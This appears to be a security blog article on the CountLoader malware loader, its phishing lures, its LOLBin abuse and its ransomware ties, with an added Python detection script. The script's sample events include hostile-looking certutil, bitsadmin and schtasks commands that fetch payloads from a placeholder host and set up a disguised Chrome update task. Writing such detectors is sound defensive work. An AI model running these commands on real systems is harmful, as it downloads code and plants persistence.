👤 NEONPALADIN
🗓️ 19 Sep 2025   🌍 Europe

CountLoader Unleashed: The Shape-Shifting Loader Fueling Russia’s Ransomware Surge

A new multi-version malware loader is powering Russian ransomware gangs, expanding their reach - and their toolkit - across Ukraine and beyond.

Fast Facts

  • CountLoader comes in three forms: .NET, PowerShell, and JavaScript.
  • Targets include Ukraine, with phishing lures impersonating local police.
  • Delivers notorious hacking tools like Cobalt Strike and PureHVNC RAT.
  • Uses Windows “Living-Off-the-Land” tools to evade detection.
  • Linked to major ransomware groups including LockBit, Black Basta, and Qilin.

The New Swiss Army Knife of Russian Cybercrime

Imagine a digital crowbar that can slip into almost any window. That’s CountLoader - a versatile malware loader now empowering some of Russia’s most infamous ransomware gangs. First flagged by cybersecurity researchers in 2024, CountLoader is no one-trick pony: it arrives in three distinct flavors - .NET, PowerShell, and JavaScript - each tailored to sneak past defenses and drop a host of hacking tools onto unsuspecting victims’ computers.

How the Attack Unfolds

Recent campaigns have targeted individuals in Ukraine, using fake police documents to trick victims into opening malicious PDFs. Once inside, CountLoader can deliver post-exploitation tools like Cobalt Strike - a favorite for hackers seeking to control compromised machines - and PureHVNC RAT, a remote access trojan that gives attackers hands-on control. The loader even sets up shop in the victim’s Music folder, hiding in plain sight as it waits for further instructions.

The JavaScript version is the most advanced, offering multiple download and execution methods, and even masquerading as a legitimate Google Chrome update task to blend in. By leveraging built-in Windows tools like certutil and bitsadmin - so-called “Living-Off-the-Land Binaries” (LOLBins) - CountLoader sidesteps many traditional security filters, much like a burglar using the homeowner’s own keys.
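As an added defender-side example (not code from the article or from the DomainTools report), the following Python scan flags the behaviours described above in process-creation command lines: certutil and bitsadmin used as downloaders, executables or scripts placed under a user's Music folder, and a scheduled task named after Google/Chrome updates whose action points into a user profile. The sample events, paths, URLs and rule names are constructed for this example.

```python
import re

# Constructed sample process-creation command lines (invented for this example;
# the hostnames and user paths are placeholders, not indicators from the report).
SAMPLE_EVENTS = [
    {"cmdline": r"certutil.exe -urlcache -split -f http://payload.example.invalid/c.txt C:\Users\u\Music\c.txt"},
    {"cmdline": r"bitsadmin /transfer GoogleUpdate /download /priority high http://payload.example.invalid/u.bin C:\Users\u\Music\upd.exe"},
    {"cmdline": r'schtasks /create /tn "GoogleUpdateTaskMachineUA" /tr "wscript C:\Users\u\Music\update.js" /sc minute /mo 15'},
    {"cmdline": r"certutil -verify C:\certs\corp.cer"},                                            # benign admin use
    {"cmdline": r'"C:\Program Files\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler'},  # the real updater
]

# Simple LOLBin / staging rules: (rule name, case-insensitive regex over the command line).
RULES = [
    ("certutil_download_or_decode", re.compile(r"\bcertutil(\.exe)?\b.*\s-(urlcache|decode)\b", re.I)),
    ("bitsadmin_transfer", re.compile(r"\bbitsadmin(\.exe)?\b.*\s/transfer\b", re.I)),
    ("music_folder_script", re.compile(r'\\Users\\[^\\]+\\Music\\[^\s"]+\.(js|ps1|exe|dll|bat|vbs)\b', re.I)),
]

# Scheduled-task creation: capture the task name (/tn) and its action (/tr).
TASK_RE = re.compile(r'\bschtasks(\.exe)?\b.*/create\b.*?/tn\s+"?([^"\s]+)"?.*?/tr\s+"?([^"]+)"?', re.I)


def classify_event(cmdline):
    """Return the names of every detection rule that fires on one command line."""
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    m = TASK_RE.search(cmdline)
    if m:
        task_name, action = m.group(2), m.group(3)
        # A genuine Chrome updater task runs from Program Files, not from a user profile.
        if re.search(r"google|chrome", task_name, re.I) and re.search(r"\\Users\\", action, re.I):
            hits.append("masquerading_chrome_update_task")
    return hits


def scan(events):
    """Map event index -> rule names, keeping only events with at least one hit."""
    findings = {}
    for i, event in enumerate(events):
        hits = classify_event(event["cmdline"])
        if hits:
            findings[i] = hits
    return findings


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(hits)}")
```

The benign certutil -verify call and the real GoogleUpdate.exe produce no findings, which is the false-positive check a practitioner would want before deploying rules like these.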

Inside the Russian Ransomware Ecosystem

CountLoader is more than just a new tool; it’s a sign of how Russia’s cybercrime scene is evolving. The loader is linked to heavyweights like LockBit, Black Basta, and Qilin, but allegiance to any single group is fleeting. As investigators from DomainTools note, these hackers are opportunists, switching teams and tools as the market - and law enforcement - shift. The real asset is not the malware, but the people behind the keyboards and their trusted networks.

These attacks are part of a broader pattern. In recent years, Russia-affiliated groups have repeatedly targeted Ukraine and other nations with hybrid campaigns blending ransomware with espionage. The use of social engineering - such as fake job offers or police notices - remains a potent entry point, as seen in other campaigns like the infamous NotPetya attack in 2017.

What’s Next?

With CountLoader’s modular design and ability to adapt, defenders face a moving target. The loader’s use of everyday system tools and cloud services like GitHub to host malicious payloads makes it especially slippery. Its rapid adoption signals a new phase in ransomware operations - one where agility and trust networks matter more than any single piece of code.

As the digital arms race accelerates, CountLoader stands as a reminder: in cybercrime, evolution never sleeps, and yesterday’s defenses are tomorrow’s open doors.

WIKICROOK

  • Loader: A loader is malicious software that installs or runs other malware on an infected system, enabling further cyberattacks or unauthorized access.
  • RAT (Remote Access Trojan): A RAT (Remote Access Trojan) is malware that lets attackers secretly control a victim’s device remotely, accessing files and system functions.
  • LOLBins: LOLBins are legitimate Windows tools that hackers abuse to perform malicious tasks, helping them evade security detection and blend in with normal activity.
  • Phishing: Phishing is a cybercrime where attackers send fake messages to trick users into revealing sensitive data or clicking malicious links.
  • Cobalt Strike: Cobalt Strike is a security testing tool often misused by hackers to launch real cyberattacks, making it a major concern in cybersecurity.

NEONPALADIN
Cyber Resilience Engineer